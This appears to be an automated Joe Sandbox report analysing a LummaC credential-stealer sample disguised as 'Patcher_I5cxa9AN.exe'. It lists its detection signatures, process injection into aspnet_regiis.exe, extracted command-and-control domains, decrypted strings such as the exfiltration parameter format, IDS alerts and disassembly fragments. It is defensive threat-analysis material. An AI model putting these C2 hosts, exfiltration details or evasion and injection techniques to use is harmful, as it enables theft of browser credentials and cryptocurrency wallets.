Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Patcher_I5cxa9AN.exe

Overview

General Information

Sample name:Patcher_I5cxa9AN.exe
Analysis ID:1584554
MD5:f23b6bce35ed7e7fd538a426defd13b8
SHA1:242506b0ef3ece7276a10ecafa756c72c28b3366
SHA256:d181f3391f059ff37e887fd3e5055e83bc45d2f3ea744e37113564352948facb
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Patcher_I5cxa9AN.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\Patcher_I5cxa9AN.exe" MD5: F23B6BCE35ED7E7FD538A426DEFD13B8)
    • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 7332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "cureprouderio.click", "tirepublicerj.shop"], "Build id": "LPnhqo--gyfsshbyotsj"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1714086853.0000000002D46000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000003.1714011851.0000000002D46000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000003.1714130661.0000000002D9B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: aspnet_regiis.exe PID: 7332JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: aspnet_regiis.exe PID: 7332JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:54.551050+010020283713Unknown Traffic192.168.2.449730172.67.132.7443TCP
                2025-01-05T20:41:55.553164+010020283713Unknown Traffic192.168.2.449731172.67.132.7443TCP
                2025-01-05T20:41:56.848103+010020283713Unknown Traffic192.168.2.449732172.67.132.7443TCP
                2025-01-05T20:41:58.395309+010020283713Unknown Traffic192.168.2.449733172.67.132.7443TCP
                2025-01-05T20:41:59.616908+010020283713Unknown Traffic192.168.2.449734172.67.132.7443TCP
                2025-01-05T20:42:00.966408+010020283713Unknown Traffic192.168.2.449735172.67.132.7443TCP
                2025-01-05T20:42:02.614994+010020283713Unknown Traffic192.168.2.449736172.67.132.7443TCP
                2025-01-05T20:42:06.017940+010020283713Unknown Traffic192.168.2.449737172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:55.054770+010020546531A Network Trojan was detected192.168.2.449730172.67.132.7443TCP
                2025-01-05T20:41:56.119480+010020546531A Network Trojan was detected192.168.2.449731172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:55.054770+010020498361A Network Trojan was detected192.168.2.449730172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:56.119480+010020498121A Network Trojan was detected192.168.2.449731172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:54.551050+010020586391Domain Observed Used for C2 Detected192.168.2.449730172.67.132.7443TCP
                2025-01-05T20:41:55.553164+010020586391Domain Observed Used for C2 Detected192.168.2.449731172.67.132.7443TCP
                2025-01-05T20:41:56.848103+010020586391Domain Observed Used for C2 Detected192.168.2.449732172.67.132.7443TCP
                2025-01-05T20:41:58.395309+010020586391Domain Observed Used for C2 Detected192.168.2.449733172.67.132.7443TCP
                2025-01-05T20:41:59.616908+010020586391Domain Observed Used for C2 Detected192.168.2.449734172.67.132.7443TCP
                2025-01-05T20:42:00.966408+010020586391Domain Observed Used for C2 Detected192.168.2.449735172.67.132.7443TCP
                2025-01-05T20:42:02.614994+010020586391Domain Observed Used for C2 Detected192.168.2.449736172.67.132.7443TCP
                2025-01-05T20:42:06.017940+010020586391Domain Observed Used for C2 Detected192.168.2.449737172.67.132.7443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:54.045515+010020586381Domain Observed Used for C2 Detected192.168.2.4591941.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-05T20:41:57.831328+010020480941Malware Command and Control Activity Detected192.168.2.449732172.67.132.7443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://cureprouderio.click/$&%W&Avira URL Cloud: Label: malware
                Source: https://cureprouderio.click/Avira URL Cloud: Label: malware
                Source: https://cureprouderio.click/api9Avira URL Cloud: Label: malware
                Source: https://cureprouderio.click/piAvira URL Cloud: Label: malware
                Source: https://cureprouderio.click/buAvira URL Cloud: Label: malware
                Source: https://cureprouderio.click/api(Avira URL Cloud: Label: malware
                Source: https://cureprouderio.click/ggAvira URL Cloud: Label: malware
                Source: cureprouderio.clickAvira URL Cloud: Label: malware
                Source: https://cureprouderio.click/jhAvira URL Cloud: Label: malware
                Source: https://cureprouderio.click/apiAvira URL Cloud: Label: malware
                Source: Patcher_I5cxa9AN.exeMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "abruptyopsn.shop", "wholersorie.shop", "nearycrepso.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "cureprouderio.click", "tirepublicerj.shop"], "Build id": "LPnhqo--gyfsshbyotsj"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\gdi32.dllJoe Sandbox ML: detected
                Source: Patcher_I5cxa9AN.exeJoe Sandbox ML: detected
                Source: Patcher_I5cxa9AN.exeString decryptor: cloudewahsj.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: rabidcowse.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: noisycuttej.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: tirepublicerj.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: framekgirus.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: wholersorie.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: abruptyopsn.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: nearycrepso.shop
                Source: Patcher_I5cxa9AN.exeString decryptor: cureprouderio.click
                Source: Patcher_I5cxa9AN.exeString decryptor: lid=%s&j=%s&ver=4.0
                Source: Patcher_I5cxa9AN.exeString decryptor: TeslaBrowser/5.5
                Source: Patcher_I5cxa9AN.exeString decryptor: - Screen Resoluton:
                Source: Patcher_I5cxa9AN.exeString decryptor: - Physical Installed Memory:
                Source: Patcher_I5cxa9AN.exeString decryptor: Workgroup: -
                Source: Patcher_I5cxa9AN.exeString decryptor: LPnhqo--gyfsshbyotsj
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_72C58664 CryptUnprotectData,2_2_72C58664
                Source: Patcher_I5cxa9AN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: Patcher_I5cxa9AN.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov eax, D6C314C9h0_2_6CE02450
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_6CE02450
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-000000BEh]0_2_6CE38C30
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0B398427h]0_2_6CE38C30
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov byte ptr [edi], al0_2_6CE14434
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then test esi, esi0_2_6CE36400
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx esi, word ptr [eax]0_2_6CE3C5F0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov edx, dword ptr [esi+54h]0_2_6CE075F5
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov word ptr [eax], cx0_2_6CE155FE
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_6CE0FDD1
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h0_2_6CE1A5D0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, dword ptr [0044D92Ch]0_2_6CE0E580
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_6CE06D72
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov byte ptr [eax], dl0_2_6CE06D72
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov byte ptr [edi], al0_2_6CE14579
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_6CE3C510
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]0_2_6CE12EC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9B8995CDh0_2_6CE12EC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov edx, ecx0_2_6CE12EC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch0_2_6CE106AC
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+01h]0_2_6CE38620
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov eax, ebx0_2_6CE0EE3E
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_6CE11FC1
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h0_2_6CE10FC8
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, eax0_2_6CE127DC
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then push ebp0_2_6CE35FA0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov word ptr [esi], cx0_2_6CE0DF80
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0D67E2D4h]0_2_6CE1F796
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_6CE18710
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, esi0_2_6CE0F885
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, esi0_2_6CE0F885
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then jmp eax0_2_6CE07853
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then push eax0_2_6CE3A020
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then push eax0_2_6CE39800
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, eax0_2_6CE1F005
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_6CE009C0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_6CE009C0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09h]0_2_6CE159A0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx]0_2_6CE059AE
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, eax0_2_6CE1B9B0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_6CE1B9B0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+218BAD1Eh]0_2_6CE12975
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp al, 20h0_2_6CDFB947
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, eax0_2_6CE122B6
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-7Dh]0_2_6CE0E293
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+40h]0_2_6CE14235
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h0_2_6CE38BC0
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov byte ptr [ecx], dl0_2_6CE063C7
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, eax0_2_6CE063C7
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], AF52E86Bh0_2_6CE21B80
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov ecx, ebx0_2_6CE16320
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov edi, edx0_2_6CE24B30
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+289080F7h]0_2_6CE14337
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then not eax0_2_6CE1033F
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then jmp 02690B81h0_2_026909EA
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_026910E8
                Source: C:\Users\user\Desktop\Patcher_I5cxa9AN.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_026910DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+01h]2_2_72C7F220
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h2_2_72C611D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, word ptr [eax]2_2_72C831F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], dl2_2_72C4D972
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [eax], dl2_2_72C4D972
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_72C83110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], AF52E86Bh2_2_72C68780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [eax+ecx]2_2_72C4C5AE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-000000DAh]2_2_72C59AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9B8995CDh2_2_72C59AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, ecx2_2_72C59AC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_72C6C2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_72C6F2FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx esi, byte ptr [esp+ebx+23h]2_2_72C81A8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi], ecx2_2_72C7029E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch2_2_72C572AC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_72C6F210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi], ecx2_2_72C7021D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, ebx2_2_72C55A3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h2_2_72C58BC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C593DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [esi], cx2_2_72C54B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-7Dh]2_2_72C54B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, dword ptr [72C8D92Ch]2_2_72C54B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-0D67E2D4h]2_2_72C66396
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push ebp2_2_72C7CBA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_72C6A3AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi+10h], ecx2_2_72C6FBBB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov dword ptr [esi], edx2_2_72C6FBBB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_72C79340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C69B53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax]2_2_72C6EB53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C7D36B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+4416C1D9h]2_2_72C7D36B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_72C5F310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_72C5732C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C6AB3C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_72C6E89E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov eax, D6C314C9h2_2_72C49050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], bl2_2_72C49050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then test esi, esi2_2_72C7D000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_72C5B034
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi-000000BEh]2_2_72C7F830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-0B398427h]2_2_72C7F830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h2_2_72C569D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edx, dword ptr [esi+54h]2_2_72C4E1F5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov word ptr [eax], cx2_2_72C5C1BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [edi], al2_2_72C5B179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C58EB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_72C6DE65
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then lea ecx, dword ptr [eax+43h]2_2_72C70673
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+40h]2_2_72C5AE35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov byte ptr [ecx], dl2_2_72C4CFC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C4CFC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_72C7F7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [edi+ecx]2_2_72C827B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, ebx2_2_72C5CF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+289080F7h]2_2_72C5AF37
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, edx2_2_72C6B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then not eax2_2_72C56F3F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, esi2_2_72C564F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, esi2_2_72C56486
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then jmp eax2_2_72C4E453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov ecx, eax2_2_72C65C05
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then push eax2_2_72C80400
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then mov edi, ecx2_2_72C6B40D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 4x nop then movzx edi, byte ptr [edi+ecx]2_2_72C82410
